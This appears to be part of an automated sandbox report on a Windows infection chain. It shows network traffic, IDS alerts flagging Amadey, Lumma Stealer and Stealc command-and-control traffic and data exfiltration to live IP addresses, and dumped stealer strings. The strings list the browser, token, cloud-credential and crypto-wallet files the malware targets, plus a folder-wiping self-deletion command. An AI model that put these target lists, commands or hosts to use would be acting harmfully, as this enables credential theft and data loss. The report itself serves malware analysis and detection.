Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64870 version: TLS 1.2

Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: C:\Users\Joker\source\repos\Handler\Handler\obj\Release\Handler.pdb source: Ta3ZyUR.exe, 00000008.00000002.2117478393.0000000003E19000.00000004.00000800.00020000.00000000.sdmp, Ta3ZyUR.exe, 00000008.00000000.1953939827.00000000009F2000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: aS@C:\CrypterX1\FolderProjectCompiled\WindowsProject8\Release\name.pdb source: qFqSpAp.exe, 0000000E.00000000.2042354432.00000000015E0000.00000002.00000001.01000000.0000000D.sdmp, qFqSpAp.exe, 0000000E.00000003.2049614926.000000000380C000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2169949820.00000000015E0000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: Phantom.pdb\ source: WER89C1.tmp.dmp.20.dr
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE, 0000002A.00000002.2513739175.0000000000CA2000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: mscorlib.pdb0 source: WER9B17.tmp.dmp.26.dr
Source:	Binary string: C:\Users\Admin\source\repos\Phantom\Phantom\obj\Release\Phantom.pdb source: jROrnzx.exe, 00000010.00000002.2193761654.0000000003C09000.00000004.00000800.00020000.00000000.sdmp, jROrnzx.exe, 00000010.00000000.2143152760.00000000006F2000.00000002.00000001.01000000.0000000F.sdmp, jROrnzx.exe.4.dr, 7aencsM.exe.4.dr
Source:	Binary string: Phantom.pdb$ source: WERF339.tmp.dmp.64.dr
Source:	Binary string: System.Windows.Forms.pdb` source: WER419C.tmp.dmp.12.dr
Source:	Binary string: System.pdb source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: mscorlib.pdbh source: WERF339.tmp.dmp.64.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: mscorlib.pdbL0Tw# source: WER419C.tmp.dmp.12.dr
Source:	Binary string: C:\CrypterX1\FolderProjectCompiled\WindowsProject8\Release\name.pdb source: qFqSpAp.exe, 0000000E.00000000.2042354432.00000000015E0000.00000002.00000001.01000000.0000000D.sdmp, qFqSpAp.exe, 0000000E.00000003.2049614926.000000000380C000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2169949820.00000000015E0000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: vdr1.pdb source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: Phantom.pdb$h source: WER9B17.tmp.dmp.26.dr
Source:	Binary string: mscorlib.pdb source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: System.Windows.Forms.pdbL0Tw# source: WER9B17.tmp.dmp.26.dr
Source:	Binary string: mscorlib.ni.pdb source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: Handler.pdb source: WER419C.tmp.dmp.12.dr
Source:	Binary string: Handler.pdba source: WER419C.tmp.dmp.12.dr
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: 7aencsM.exe, 00000015.00000002.2220696587.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2775673323.0000000000401000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: Phantom.pdb source: WER89C1.tmp.dmp.20.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr
Source:	Binary string: System.ni.pdb source: WER89C1.tmp.dmp.20.dr, WER419C.tmp.dmp.12.dr, WERF339.tmp.dmp.64.dr, WER9B17.tmp.dmp.26.dr

Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov word ptr [ecx], dx	9_2_00411938
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2Dh]	9_2_0040BA00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edi, edx	9_2_0040BA00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, ecx	9_2_0040F2AB
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 42D635B2h	9_2_00444B3B
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, ecx	9_2_0042CC20
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, ecx	9_2_00425D00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	9_2_00425D00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	9_2_00446510
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]	9_2_00442660
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx edx, byte ptr [eax]	9_2_0040EE00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, ecx	9_2_0040EE00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+2Eh]	9_2_00410E10
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	9_2_00446610
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+50A97441h]	9_2_00446610
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-00000096h]	9_2_00446610
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx ebx, word ptr [esi]	9_2_00446610
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+42ADD582h]	9_2_0040CEE0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, ecx	9_2_0043F740
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edi, ecx	9_2_00446FE0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-00000096h]	9_2_00446FE0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	9_2_0043D040
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov eax, ebx	9_2_00421820
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	9_2_004238E0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov dword ptr [esp+34h], ebx	9_2_0042013E
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	9_2_004469C0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	9_2_004019E0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, eax	9_2_00446190
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then jmp ecx	9_2_00446190
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movsx ecx, byte ptr [esi+eax]	9_2_004191A0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	9_2_0041CA5C
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then lea ecx, dword ptr [esp+0000009Ch]	9_2_0041CA5C
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	9_2_0041CA5C
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_00426A60
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax-71h]	9_2_00442A70
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	9_2_00430A10
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov ebp, eax	9_2_00408A20
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp word ptr [eax+ebp+02h], 0000h	9_2_0042F2F0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	9_2_0040A290
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	9_2_0040A290
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, ecx	9_2_00444295
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp word ptr [eax+ebp+02h], 0000h	9_2_0042F350
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0Ah]	9_2_0041037E
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov eax, ebx	9_2_00445B10
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, eax	9_2_00445B10
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then jmp ecx	9_2_00445B10
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov ecx, eax	9_2_0041DB1C
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax-65h]	9_2_00442B30
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+02h]	9_2_00440B39
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov ecx, eax	9_2_00411462
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov eax, ebx	9_2_00445C00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, eax	9_2_00445C00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then jmp ecx	9_2_00445C00
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov eax, ebx	9_2_00445C18
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, eax	9_2_00445C18
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then jmp ecx	9_2_00445C18
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov eax, ebx	9_2_00445C1A
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, eax	9_2_00445C1A
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then jmp ecx	9_2_00445C1A
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edx-00625A3Ch]	9_2_0042C420
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh	9_2_00446CC0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov ecx, eax	9_2_0042ACD8
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov ecx, eax	9_2_0042ACD8
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebp-000000C2h]	9_2_0041FCF0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-06090D71h]	9_2_00440550
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000274h]	9_2_00432D5C
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov byte ptr [esi], cl	9_2_0043456B
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000274h]	9_2_00432DE9
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then jmp eax	9_2_0042FD8B
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov eax, ebx	9_2_00445D90
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, eax	9_2_00445D90
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then jmp ecx	9_2_00445D90
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	9_2_0041DE50
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6Dh]	9_2_0041DE50
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp dword ptr [edx+eax*8], 720EEED4h	9_2_00442E50
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9F1F8F53h	9_2_00442E50
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov ecx, eax	9_2_0040D66A
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov edx, ebx	9_2_0042BE75
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp word ptr [ebx+eax], 0000h	9_2_0042067F
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	9_2_0042067F
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov byte ptr [esi], cl	9_2_0043467D
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000274h]	9_2_00432D29
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov byte ptr [esi], cl	9_2_004346D8
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov byte ptr [esi], cl	9_2_004346E7
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_0041C6EF
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov ecx, eax	9_2_0041EEF0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	9_2_00426E90
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov ecx, eax	9_2_004446BA
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then add edi, 02h	9_2_00431F50
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	9_2_00402770
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then mov esi, eax	9_2_00419FD8
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+24h]	9_2_0042CFF0
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+1Ch]	9_2_0040DF9C
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+2EFC5311h]	9_2_0041F7AB

Source: chrome.exe

Memory has grown: Private usage: 0MB later: 30MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:64635 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64640 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.9:64636
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64652 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2060062 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (blastikcn .com) : 192.168.2.9:61804 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64655 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64661 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64656 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64662 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64666 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64667 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64669 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:64668 -> 91.202.233.244:80
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64671 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2060063 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (blastikcn .com in TLS SNI) : 192.168.2.9:64673 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64685 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.9:64691 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64676 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64711 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.9:64726 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64732 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64737 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.9:64698 -> 185.215.113.43:80
